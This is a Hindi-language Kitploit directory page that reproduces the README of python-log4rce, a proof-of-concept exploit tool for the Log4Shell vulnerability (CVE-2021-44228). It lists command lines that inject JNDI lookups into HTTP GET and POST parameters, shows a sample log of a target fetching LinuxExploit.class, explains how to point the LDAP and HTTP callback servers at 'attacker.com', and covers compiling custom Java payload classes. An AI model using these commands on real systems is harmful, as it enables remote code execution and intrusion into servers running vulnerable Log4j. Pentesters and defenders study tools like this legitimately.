Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
python-log4rce — CVE-2021-44228 के लिए एक संपूर्ण शुद्ध Python PoC | Kitploit
उपकरण/GitHubGitHub/alexandre-lavoie/python-log4rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubalexandre-lavoie/python-log4rce

python-log4rce

CVE-2021-44228 के लिए एक संपूर्ण शुद्ध Python PoC

रिपॉजिटरी देखें
178294 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Python Log4RCE

CVE-2021-44228 के लिए एक ऑल-इन-वन शुद्ध Python3 PoC।

नमूना

root@kitploit:~
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
root@kitploit:~
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

उपयोग

यह एक CLI टूल है। सभी विकल्प हेल्प मेनू में पाए जा सकते हैं:

root@kitploit:~
python3 log4rce.py --help

सूची काफी लंबी है, इसलिए निम्नलिखित आपको कार्यक्षमता का सारांश देगा।

हमले के तरीके

टूल आपको कुछ हमले के तरीकों का उपयोग करने की अनुमति देता है। ये हमले Log4RCE क्लास के विस्तार हैं।

HTTP

आप लक्षित URL पर एक स्वचालित HTTP रिक्वेस्ट हमला कर सकते हैं।

आप GET रिक्वेस्ट निम्नानुसार कर सकते हैं:

root@kitploit:~
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

आप POST रिक्वेस्ट निम्नानुसार कर सकते हैं:

root@kitploit:~
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

पूर्ववर्ती ### में JNDI टैग इंजेक्ट करेगा।

मैन्युअल

यदि आप उपरोक्त में से किसी का उपयोग नहीं कर सकते हैं, तो JDNI टैग डंप करने के लिए इस मोड का उपयोग करें:

root@kitploit:~
python3 log4rce.py manual

नेटवर्क सेटिंग्स

टूल अधिकांश नेटवर्क कॉन्फ़िगरेशन के लिए व्यापक अनुकूलन की अनुमति देता है। रिमोट सेटिंग्स के अनुसार सभी आंतरिक सर्वरों को विभिन्न स्थानों की ओर इंगित करने के लिए संशोधित किया जा सकता है।

HTTP सर्वर

आप निम्नलिखित पैरामीटर का उपयोग करके HTTP सर्वर कॉन्फ़िगर कर सकते हैं:

root@kitploit:~
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
root@kitploit:~
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 

LDAP सर्वर

आप निम्नलिखित पैरामीटर का उपयोग करके LDAP सर्वर कॉन्फ़िगर कर सकते हैं:

root@kitploit:~
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
root@kitploit:~
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 

अनुकूलन

टूल कुछ अनुकूलन संभाल सकता है। निम्नलिखित कुछ कार्यक्षमताओं को सूचीबद्ध करता है जिनमें आपकी रुचि हो सकती है।

पेलोड इंजेक्ट करना

आप निम्न का उपयोग करके Java क्लास में पेलोड इंजेक्ट कर सकते हैं:

root@kitploit:~
python3 log4rce.py --payload "PAYLOAD"

पेलोड को "###" स्ट्रिंग्स में इंजेक्ट किया जाएगा।

कस्टम Java पेलोड

आप निम्नलिखित का उपयोग करके अपनी खुद की Java क्लास बना सकते हैं।

root@kitploit:~
javac -source 1.7 -target 1.7 /path/to/Exploit.java

परिणामी .class को निम्न का उपयोग करके चलाया जा सकता है:

root@kitploit:~
python3 log4rce.py --java_class "/path/to/Exploit.class" ...

नोट: पेलोड इंजेक्शन की अनुमति देने के लिए आप एक स्ट्रिंग "###" जोड़ सकते हैं।

टूल डाउनलोड करें